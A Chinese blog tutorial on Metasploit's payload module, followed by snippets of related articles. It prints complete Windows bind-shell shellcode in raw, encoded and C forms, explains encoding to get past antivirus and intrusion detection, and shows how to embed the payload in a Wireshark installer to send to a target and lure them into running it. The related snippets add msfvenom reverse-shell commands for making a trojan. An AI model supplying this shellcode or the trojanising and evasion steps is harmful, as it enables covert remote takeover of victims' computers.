谈谈Metasploit中payload模块

最新推荐文章于 2024-08-11 12:43:57 发布
最新推荐文章于 2024-08-11 12:43:57 发布
阅读量2.8k 收藏 6
点赞数 2
分类专栏: metasploit kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39353923/article/details/83152110
版权

我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell.

msf > use payload/windows/shell_bind_tcp   #使用该模块绑定(监听)本机的一个TCP连接端口
msf payload(windows/shell_bind_tcp) > generate  #通过generate生成16进值的payload,默认以rube语言编写的
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

由 generate 产生的shellcode是完全可以运行的,但是其中包含一些null空字符,在一些程序进行解析时,这些空字符会被认为是字符串的结束,从而使得代码在完整执行之前被截断而终止运行。简单来说,这些\x00 ,\ff和\xff字符会破坏攻击负荷。

另外,在网络上明文传输的shellcode很可能被入侵检测系统和杀毒软件所识别,为了解决这一问题,Metasploit的开发提供MSF编码器,可以帮助渗透测试者通过对原始攻击载荷进行编码的方式,来避免坏字符,以及逃避杀毒软件和IDS的检测。
我们使用generate -b '\x00’将\x00坏字符进行编码避免在执行的过程中被截断而终止.

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai  #表示使用此Encoder对坏字符进行编码,generate会自动选择Encoder
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xbd\x43\x0e\x07\xaa\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x68\x12\x03\x68\x12\x83\xab\xf2\xe5\x5f\xd7" +
"\xe3\x68\x9f\x27\xf4\x0c\x29\xc2\xc5\x0c\x4d\x87\x76\xbd" +
"\x05\xc5\x7a\x36\x4b\xfd\x09\x3a\x44\xf2\xba\xf1\xb2\x3d" +
"\x3a\xa9\x87\x5c\xb8\xb0\xdb\xbe\x81\x7a\x2e\xbf\xc6\x67" +
"\xc3\xed\x9f\xec\x76\x01\xab\xb9\x4a\xaa\xe7\x2c\xcb\x4f" +
"\xbf\x4f\xfa\xde\xcb\x09\xdc\xe1\x18\x22\x55\xf9\x7d\x0f" +
"\x2f\x72\xb5\xfb\xae\x52\x87\x04\x1c\x9b\x27\xf7\x5c\xdc" +
"\x80\xe8\x2a\x14\xf3\x95\x2c\xe3\x89\x41\xb8\xf7\x2a\x01" +
"\x1a\xd3\xcb\xc6\xfd\x90\xc0\xa3\x8a\xfe\xc4\x32\x5e\x75" +
"\xf0\xbf\x61\x59\x70\xfb\x45\x7d\xd8\x5f\xe7\x24\x84\x0e" +
"\x18\x36\x67\xee\xbc\x3d\x8a\xfb\xcc\x1c\xc3\xc8\xfc\x9e" +
"\x13\x47\x76\xed\x21\xc8\x2c\x79\x0a\x81\xea\x7e\x6d\xb8" +
"\x4b\x10\x90\x43\xac\x39\x57\x17\xfc\x51\x7e\x18\x97\xa1" +
"\x7f\xcd\x02\xa9\x26\xbe\x30\x54\x98\x6e\xf5\xf6\x71\x65" +
"\xfa\x29\x61\x86\xd0\x42\x0a\x7b\xdb\x7d\x97\xf2\x3d\x17" +
"\x37\x53\x95\x8f\xf5\x80\x2e\x28\x05\xe3\x06\xde\x4e\xe5" +
"\x91\xe1\x4e\x23\xb6\x75\xc5\x20\x02\x64\xda\x6c\x22\xf1" +
"\x4d\xfa\xa3\xb0\xec\xfb\xe9\x22\x8c\x6e\x76\xb2\xdb\x92" +
"\x21\xe5\x8c\x65\x38\x63\x21\xdf\x92\x91\xb8\xb9\xdd\x11" +
"\x67\x7a\xe3\x98\xea\xc6\xc7\x8a\x32\xc6\x43\xfe\xea\x91" +
"\x1d\xa8\x4c\x48\xec\x02\x07\x27\xa6\xc2\xde\x0b\x79\x94" +
"\xde\x41\x0f\x78\x6e\x3c\x56\x87\x5f\xa8\x5e\xf0\xbd\x48" +
"\xa0\x2b\x06\x78\xeb\x71\x2f\x11\xb2\xe0\x6d\x7c\x45\xdf" +
"\xb2\x79\xc6\xd5\x4a\x7e\xd6\x9c\x4f\x3a\x50\x4d\x22\x53" +
"\x35\x71\x91\x54\x1c"

当然也可以通过generate -e自行指定Encoder对坏字符进行编码

msf payload(windows/shell_bind_tcp) > generate -e x86/nonupper

generate的参数列表:
-b:指定对坏字符进行过滤编码
-t:指定payload的输出格式,如exe格式,py格式,默认是ruby语言编写的16进值编码的形式
-e:指定某个Encoder进行编码,不指定的话,系统会自行选择适合的Encoder
-i:后面跟编码迭代次数,也就是编码的次数
-k:不产生新的进程,只产生线程,提交隐蔽性.
-x:将payload穿插进入可执行的模板中(可以理解为应用程序)这样只要该应用程序运行,payload即也将会运行.
-f:指定输出的位置
举个例子:
我们在wireshark.exe程序中插入payload并命名为1.exe

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /root/Wireshark-win64-2.6.3.exe -f /root/1.exe
[*] Writing 628224 bytes to /root/1.exe...

然后可以将wireshark打包发送给目标主机使用者,诱使其点击,然后便可以在本地使用远程工具连接目标主机啦

NOP:no-operation/Next operation(无任何操作):当程序执行到NOP指令的时候,CUP会自动滑到当前字节的下一个字节,如果下一个字节也是NOP,便会一直往下滑

使用generate -t c:指定使用c语言编写此payload

msf payload(windows/shell_bind_tcp) > generate -t c
/*
 * windows/shell_bind_tcp - 328 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
 * EXITFUNC=process
 */
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7"
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97"
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
"\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0"
"\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5"
"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb"
"\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Louisnie
关注
专栏目录
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5891
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1299
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
metasploit payload模块介绍
热门推荐
星落的博客
05-19 1万+
generate命令介绍 -b 过滤坏字符 '\x00,\xff' -e 指定将要使用的加密技术(show encoder查看加密模块) -f 指定输出文件格式 -h 查看帮助信息 -i 设置加密payload的次数 -k 提高速度 -x 指定自定义可执行文件作为模板 -o 设置输出文件名称 实例演示-生成木马 1.查看metasploit集成的payload show payload 2.使用反弹的payload use payload windows/shell...
Payload是啥】
最新发布
lianafany的博客
08-11 294
在TCP/IP协议Payload是指除了头部之外的数据部分。在HTTP协议Payload是请求或响应的主体部分,位于请求行的后面和消息头的下面。在MQTT协议Payload是指消息的实际内容,可以是任意类型的数据。在SMTP协议Payload是指电子邮件的正文内容,包括文本、图片、音频、视频等。在SSH协议Payload是指用户输入的命令或交互信息。Payload在计算机网络是数据传输实际要传输的信息,可以是文本、文件、图片等。不同的网络协议使用Payload的方式和目的各不相同。
msf-Windows payload
zzzzzyx_的博客
05-23 342
msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章 您们也就不要赏钱了 下面????????的是坑钱的 其实我是一个 12 岁的 球娃 ...
生成常用的msf
weixin_34268310的博客
01-08 238
生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 生成二进...
Mastering-Metasploit:掌握MetasploitMetasploit模块
05-17
此存储库包含《掌握Metasploit手册》涵盖的模块: #要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / ...
Metasploit模块深入解析:Payload模块原理与应用
Metasploit简介与Payload模块概述 ## 1.1 Metasploit框架简介 Metasploit是一款开源的渗透测试框架,由Rapid7公司维护和支持。该框架提供了全面的渗透测试工具,包括漏洞利用、Payload生成、社会工程学等多种功能...
mad-metasploitMetasploit自定义模块,插件,资源脚本和很棒的metasploit集合
02-22
Metasploit自定义模块,插件,资源脚本和超棒的metasploit集合 惊人的 打开 将mad-metasploit添加到metasploit框架 配置您的metasploit-framework目录 $ vim config/config.rb $metasploit_path = '/opt/metasploit-...
VS Build Tools
12-06
C++ 生成工具安装包
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7900
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块
MSF——Payload模块(二)
dishan4749253的博客
09-07 1009
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payloadpayload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,expl...
msfvenom生成各种Payload命令
IT界迷者Blog--
10-17 3160
msfvenom生成各种Payload命令 msfvenom -l 列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > ...
msf如何选择payload,这里给你解释
weixin_44270509的博客
08-09 4167
MetasploitPayload 模块一。类型(三种基础的)二。名称和格式三。 Stager几种常见的payload(metepreter为主) 因为有一阵子天天弄不清楚到底选择哪个payload而感觉脑壳痛,所以查了很多资料,我大致在这里总结一下 一。类型(三种基础的) 1-Single: 是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系...
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1558
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
Visual Studio2019安装vsix扩展文件
DHZYKN
02-28 1万+
除了在Visual Studio上安装扩展,还可以手动安装本地已有的vsix扩展文件,具体操作如下: cmd 命令切换到Visual Studio2019程序目录,也就是VSIXInstaller.exe程序所在目录,然后输入:VSIXInstaller.exe(空格)vsix文件全路径;按回车进入安装界面; ...
VS2017 离线安装vsix插件
King_Victory的博客
02-18 9145
使用VS2017时我们要安装拓展插件,除了直接在IDE里联机安装外(工具——>扩展和更新——>联机——>下载) 还可以预先下好对应的.vsix文件 然后在cmd里进入下示路径 将vsix文件直接拖拽到该窗口即可进行安装 ...
payload.bin打包
05-12
对于打包 `payload.bin`,通常需要以下步骤: 1. 编写或者获取需要打包的二进制文件 `payload.bin`。 2. 创建一个空的可执行文件 `payload.exe`,大小与 `payload.bin` 一样。 3. 将 `payload.bin` 的二进制数据复制到 `payload.exe` ,可以使用 `dd` 命令: ``` dd if=payload.bin of=payload.exe bs=1 seek=0 conv=notrunc ``` 其 `bs=1` 表示每次读取一个字节,`seek=0` 表示从文件开始处写入,`conv=notrunc` 表示不截断输出文件。 4. 修改 `payload.exe` 的执行权限为可执行: ``` chmod +x payload.exe ``` 这样就完成了 `payload.bin` 的打包操作。需要注意的是,在实际使用,可能还需要将 `payload.exe` 嵌入到其他程序或者系统,具体操作方式根据具体情况而定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值